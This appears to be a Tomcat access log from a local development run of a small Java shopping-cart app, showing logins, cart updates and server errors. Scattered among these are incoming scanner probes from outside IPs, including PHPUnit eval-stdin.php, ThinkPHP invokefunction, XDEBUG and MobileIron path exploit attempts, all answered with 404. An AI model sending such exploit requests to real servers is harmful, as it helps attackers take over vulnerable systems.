0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:52:34 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-10 20
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:52:35 +0800] "GET /eswz/insertCart HTTP/1.1" 200 70 http-bio-8080-exec-10 13
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:52:36 +0800] "GET /eswz/index HTTP/1.1" 200 16794 http-bio-8080-exec-10 22
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:52:38 +0800] "GET /eswz/detailGoods?goodsid=7 HTTP/1.1" 200 4901 http-bio-8080-exec-10 11
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:52:38 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-10 18
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:52:39 +0800] "GET /eswz/insertCart HTTP/1.1" 200 70 http-bio-8080-exec-10 12
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:52:40 +0800] "GET /eswz/index HTTP/1.1" 200 16794 http-bio-8080-exec-10 21
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:52:41 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 5672 http-bio-8080-exec-10 23
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:52:41 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-10 18
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:52:42 +0800] "GET /eswz/deleteGoods?goodsid=4 HTTP/1.1" 302 - http-bio-8080-exec-10 14
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:52:42 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 5226 http-bio-8080-exec-10 7
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:52:42 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-10 16
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:52:47 +0800] "GET /eswz/deleteGoods?goodsid=6 HTTP/1.1" 302 - http-bio-8080-exec-10 9
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:52:47 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 4793 http-bio-8080-exec-10 8
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:52:47 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-10 18
0:0:0:0:0:0:0:1 - - [20/Nov/2022:14:53:58 +0800] "GET /eswz/updateCart?goodsid=7&quantity=2 HTTP/1.1" 500 4113 http-bio-8080-exec-4 8
92.118.39.78 - - [20/Nov/2022:15:00:28 +0800] "GET / HTTP/1.1" 404 - http-bio-8080-exec-6 0
162.142.125.221 - - [20/Nov/2022:15:00:39 +0800] "GET / HTTP/1.1" 404 - http-bio-8080-exec-9 0
162.142.125.221 - - [20/Nov/2022:15:00:39 +0800] "GET / HTTP/1.1" 404 - http-bio-8080-exec-3 0
162.142.125.221 - - [20/Nov/2022:15:00:40 +0800] "PRI * HTTP/2.0" 505 - null 0
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:03:22 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-1 0
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:03:22 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 45
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:03:22 +0800] "GET /eswz/index HTTP/1.1" 200 16260 http-bio-8080-exec-4 616
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:04:02 +0800] "GET /eswz/toUsersLogin HTTP/1.1" 200 2635 http-bio-8080-exec-5 8
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:04:08 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 61 http-bio-8080-exec-6 11
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:04:09 +0800] "GET /eswz/index HTTP/1.1" 200 16794 http-bio-8080-exec-7 30
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:04:10 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 4793 http-bio-8080-exec-8 24
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:04:10 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-9 22
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:05:26 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 4801 http-bio-8080-exec-1 617
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:05:26 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-1 24
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:05:28 +0800] "GET /eswz/updateQuantity?goodsid=3&quantity=2 HTTP/1.1" 500 6183 http-bio-8080-exec-5 26
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:06:19 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-1 0
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:06:19 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 38
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:06:20 +0800] "GET /eswz/index HTTP/1.1" 200 16260 http-bio-8080-exec-4 687
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:06:24 +0800] "GET /eswz/toUsersLogin HTTP/1.1" 200 2635 http-bio-8080-exec-5 11
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:06:29 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 61 http-bio-8080-exec-6 12
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:06:30 +0800] "GET /eswz/index HTTP/1.1" 200 16794 http-bio-8080-exec-7 24
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:06:31 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 4801 http-bio-8080-exec-8 25
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:06:31 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-9 21
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:06:34 +0800] "GET /eswz/updateQuantity?goodsid=3&quantity=2 HTTP/1.1" 500 6183 http-bio-8080-exec-10 15
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:07:48 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-2 0
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:07:48 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 42
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:07:49 +0800] "GET /eswz/index HTTP/1.1" 200 16260 http-bio-8080-exec-4 519
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:07:51 +0800] "GET /eswz/toUsersLogin HTTP/1.1" 200 2635 http-bio-8080-exec-5 9
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:07:56 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 61 http-bio-8080-exec-6 8
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:07:57 +0800] "GET /eswz/index HTTP/1.1" 200 16794 http-bio-8080-exec-7 31
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:07:58 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 4801 http-bio-8080-exec-8 20
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:07:58 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-9 19
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:08:01 +0800] "GET /eswz/updateQuantity?goodsid=3&quantity=2 HTTP/1.1" 500 6183 http-bio-8080-exec-10 17
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:11:48 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-1 0
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:11:49 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 37
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:11:49 +0800] "GET /eswz/index HTTP/1.1" 200 16260 http-bio-8080-exec-4 459
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:11:50 +0800] "GET /eswz/getCart?userid= HTTP/1.1" 400 968 http-bio-8080-exec-5 11
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:11:55 +0800] "GET /eswz/toUserRegister HTTP/1.1" 404 989 http-bio-8080-exec-2 8
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:12:01 +0800] "GET /eswz/toUserRegister HTTP/1.1" 404 989 http-bio-8080-exec-7 2
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:12:05 +0800] "GET /eswz/toUsersLogin HTTP/1.1" 200 2635 http-bio-8080-exec-8 11
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:12:16 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 61 http-bio-8080-exec-9 9
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:12:18 +0800] "GET /eswz/index HTTP/1.1" 200 16794 http-bio-8080-exec-10 29
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:12:19 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 4801 http-bio-8080-exec-10 18
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:12:19 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-10 16
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:12:23 +0800] "GET /eswz/updateQuantity?goodsid=3&quantity=2 HTTP/1.1" 500 6183 http-bio-8080-exec-10 15
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:16:22 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-1 0
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:16:22 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 37
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:16:22 +0800] "GET /eswz/index HTTP/1.1" 500 10153 http-bio-8080-exec-4 107
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:19:16 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-1 0
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:19:16 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 49
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:19:16 +0800] "GET /eswz/index HTTP/1.1" 200 16260 http-bio-8080-exec-4 487
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:19:18 +0800] "GET /eswz/toUsersLogin HTTP/1.1" 200 2635 http-bio-8080-exec-5 9
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:19:23 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 61 http-bio-8080-exec-6 10
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:19:24 +0800] "GET /eswz/index HTTP/1.1" 200 16794 http-bio-8080-exec-7 28
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:19:26 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 4801 http-bio-8080-exec-8 721
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:19:27 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-9 25
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:19:34 +0800] "GET /eswz/updateQuantity?goodsid=7&quantity=3 HTTP/1.1" 500 6183 http-bio-8080-exec-10 20
152.89.196.211 - - [20/Nov/2022:15:21:59 +0800] "GET /securityRealm/user/admin/search/index?q=a HTTP/1.1" 404 - http-bio-8080-exec-1 0
152.89.196.211 - - [20/Nov/2022:15:25:15 +0800] "GET / HTTP/1.1" 404 - http-bio-8080-exec-3 0
152.89.196.211 - - [20/Nov/2022:15:27:20 +0800] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - http-bio-8080-exec-4 0
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:27:41 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-2 0
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:27:41 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 39
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:27:41 +0800] "GET /eswz/index HTTP/1.1" 200 16260 http-bio-8080-exec-4 578
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:27:43 +0800] "GET /eswz/toUsersLogin HTTP/1.1" 200 2635 http-bio-8080-exec-5 11
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:27:48 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 61 http-bio-8080-exec-6 11
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:27:49 +0800] "GET /eswz/index HTTP/1.1" 200 16794 http-bio-8080-exec-7 28
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:27:50 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 500 6224 http-bio-8080-exec-8 588
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:27:50 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 500 6224 http-bio-8080-exec-1 22
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:30:08 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-1 0
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:30:08 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 41
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:30:09 +0800] "GET /eswz/index HTTP/1.1" 200 16260 http-bio-8080-exec-4 466
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:30:11 +0800] "GET /eswz/toUsersLogin HTTP/1.1" 200 2635 http-bio-8080-exec-5 11
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:30:16 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 61 http-bio-8080-exec-6 10
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:30:17 +0800] "GET /eswz/index HTTP/1.1" 200 16794 http-bio-8080-exec-7 28
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:30:19 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 4801 http-bio-8080-exec-8 589
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:30:19 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-9 19
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:30:23 +0800] "GET /eswz/updateQuantity?goodsid=3&quantity=5 HTTP/1.1" 500 6183 http-bio-8080-exec-10 21
152.89.196.211 - - [20/Nov/2022:15:31:55 +0800] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 - http-bio-8080-exec-1 0
152.89.196.211 - - [20/Nov/2022:15:33:47 +0800] "GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1" 404 - http-bio-8080-exec-3 0
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:35:40 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-1 0
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:35:40 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 34
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:35:41 +0800] "GET /eswz/index HTTP/1.1" 200 16260 http-bio-8080-exec-4 485
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:35:46 +0800] "GET /eswz/toUsersLogin HTTP/1.1" 200 2635 http-bio-8080-exec-5 11
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:35:51 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 61 http-bio-8080-exec-6 13
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:35:52 +0800] "GET /eswz/index HTTP/1.1" 200 16794 http-bio-8080-exec-7 30
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:35:53 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 4801 http-bio-8080-exec-8 23
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:35:53 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-9 20
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:37:37 +0800] "GET /eswz/updateQuantity?goodsid=3&quantity=2 HTTP/1.1" 302 - http-bio-8080-exec-1 24
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:37:37 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 4801 http-bio-8080-exec-1 8
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:37:37 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-1 20
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:38:07 +0800] "GET /eswz/updateQuantity?goodsid=7&quantity= HTTP/1.1" 302 - http-bio-8080-exec-1 10
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:38:07 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 4802 http-bio-8080-exec-1 7
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:38:08 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-1 17
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:38:08 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-1 17
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:38:08 +0800] "GET /eswz/bootstrap-5.1.3-dist/js/bootstrap.bundle.min.js.map HTTP/1.1" 200 331017 http-bio-8080-exec-1 13
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:38:08 +0800] "GET /eswz/bootstrap-5.1.3-dist/css/bootstrap.min.css.map HTTP/1.1" 200 451427 http-bio-8080-exec-1 5
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:38:16 +0800] "GET /eswz/updateQuantity?goodsid=7&quantity=2 HTTP/1.1" 302 - http-bio-8080-exec-1 8
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:38:16 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 4802 http-bio-8080-exec-1 7
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:38:16 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-1 18
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:38:18 +0800] "GET /eswz/updateQuantity?goodsid=7&quantity=2 HTTP/1.1" 302 - http-bio-8080-exec-1 11
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:38:18 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 4802 http-bio-8080-exec-1 7
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:38:18 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-1 19
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:38:20 +0800] "GET /eswz/updateQuantity?goodsid=7&quantity=2 HTTP/1.1" 302 - http-bio-8080-exec-1 9
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:38:20 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 4802 http-bio-8080-exec-1 7
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:38:20 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-1 18
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:38:21 +0800] "GET /eswz/updateQuantity?goodsid=3&quantity=1 HTTP/1.1" 302 - http-bio-8080-exec-1 9
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:38:21 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 4802 http-bio-8080-exec-1 7
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:38:22 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-1 17
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:38:24 +0800] "GET /eswz/updateQuantity?goodsid=3&quantity=4 HTTP/1.1" 302 - http-bio-8080-exec-1 10
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:38:24 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 4802 http-bio-8080-exec-1 6
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:38:24 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-1 15
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:38:31 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 4802 http-bio-8080-exec-1 10
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:38:31 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-1 16
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:38:31 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 4802 http-bio-8080-exec-1 6
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:38:31 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-1 16
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:38:31 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 4802 http-bio-8080-exec-1 6
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:38:31 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-1 19
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:38:31 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 4802 http-bio-8080-exec-1 5
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:38:31 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-1 17
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:38:31 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 4802 http-bio-8080-exec-1 4
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:38:31 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-1 16
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:38:31 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 4802 http-bio-8080-exec-1 4
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:38:31 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-1 15
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:38:33 +0800] "GET /eswz/updateQuantity?goodsid=3&quantity=2 HTTP/1.1" 302 - http-bio-8080-exec-1 10
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:38:33 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 4802 http-bio-8080-exec-1 5
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:38:33 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-1 15
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:38:48 +0800] "GET /eswz/updateQuantity?goodsid=3&quantity=4 HTTP/1.1" 302 - http-bio-8080-exec-1 9
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:38:48 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 4802 http-bio-8080-exec-1 7
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:38:48 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-1 17
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:39:07 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 4802 http-bio-8080-exec-1 12
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:39:07 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-1 18
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:39:10 +0800] "GET /eswz/updateQuantity?goodsid=3&quantity=4 HTTP/1.1" 302 - http-bio-8080-exec-1 5
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:39:10 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 4802 http-bio-8080-exec-1 4
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:39:10 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-1 24
152.89.196.211 - - [20/Nov/2022:15:39:19 +0800] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 404 - http-bio-8080-exec-4 0
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:41:07 +0800] "GET /eswz HTTP/1.1" 302 - http-bio-8080-exec-2 0
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:41:07 +0800] "GET /eswz/ HTTP/1.1" 302 - http-bio-8080-exec-3 38
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:41:08 +0800] "GET /eswz/index HTTP/1.1" 200 16260 http-bio-8080-exec-4 838
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:41:08 +0800] "GET /favicon.ico HTTP/1.1" 404 - http-bio-8080-exec-5 0
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:41:11 +0800] "GET /eswz/toUsersLogin HTTP/1.1" 200 2635 http-bio-8080-exec-6 9
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:41:16 +0800] "POST /eswz/usersLogin HTTP/1.1" 200 61 http-bio-8080-exec-7 11
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:41:17 +0800] "GET /eswz/index HTTP/1.1" 200 16794 http-bio-8080-exec-8 26
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:41:18 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 4802 http-bio-8080-exec-9 21
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:41:18 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-10 21
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:41:21 +0800] "GET /eswz/updateQuantity?goodsid=3&quantity=4 HTTP/1.1" 302 - http-bio-8080-exec-10 17
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:41:21 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 4802 http-bio-8080-exec-10 6
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:41:21 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-10 22
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:41:31 +0800] "GET /eswz/updateQuantity?goodsid=3&quantity=4 HTTP/1.1" 302 - http-bio-8080-exec-10 10
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:41:31 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 4802 http-bio-8080-exec-10 10
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:41:31 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-10 22
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:41:58 +0800] "GET /eswz/updateQuantity?goodsid=7&quantity=4 HTTP/1.1" 302 - http-bio-8080-exec-10 8
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:41:58 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 4802 http-bio-8080-exec-10 10
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:41:58 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-10 24
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:42:11 +0800] "GET /eswz/updateQuantity?goodsid=3&quantity=4 HTTP/1.1" 302 - http-bio-8080-exec-10 13
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:42:11 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 4802 http-bio-8080-exec-10 9
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:42:11 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-10 18
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:43:02 +0800] "GET /eswz/deleteGoods?goodsid=7 HTTP/1.1" 302 - http-bio-8080-exec-10 9
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:43:02 +0800] "GET /eswz/getCart?userid=4 HTTP/1.1" 200 4348 http-bio-8080-exec-10 5
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:43:02 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-10 15
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:43:08 +0800] "GET /eswz/index HTTP/1.1" 200 16794 http-bio-8080-exec-10 23
152.89.196.211 - - [20/Nov/2022:15:43:08 +0800] "POST /mifs/.;/services/LogService HTTP/1.1" 404 - http-bio-8080-exec-1 0
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:43:09 +0800] "GET /eswz/detailGoods?goodsid=4 HTTP/1.1" 200 5039 http-bio-8080-exec-10 18
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:43:10 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-10 24
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:43:11 +0800] "GET /eswz/insertCart HTTP/1.1" 200 70 http-bio-8080-exec-10 13
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:43:12 +0800] "GET /eswz/index HTTP/1.1" 200 16794 http-bio-8080-exec-10 24
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:43:14 +0800] "GET /eswz/detailGoods?goodsid=9 HTTP/1.1" 200 5278 http-bio-8080-exec-10 10
0:0:0:0:0:0:0:1 - - [20/Nov/2022:15:43:14 +0800] "GET /eswz/index.css HTTP/1.1" 200 16794 http-bio-8080-exec-10 24
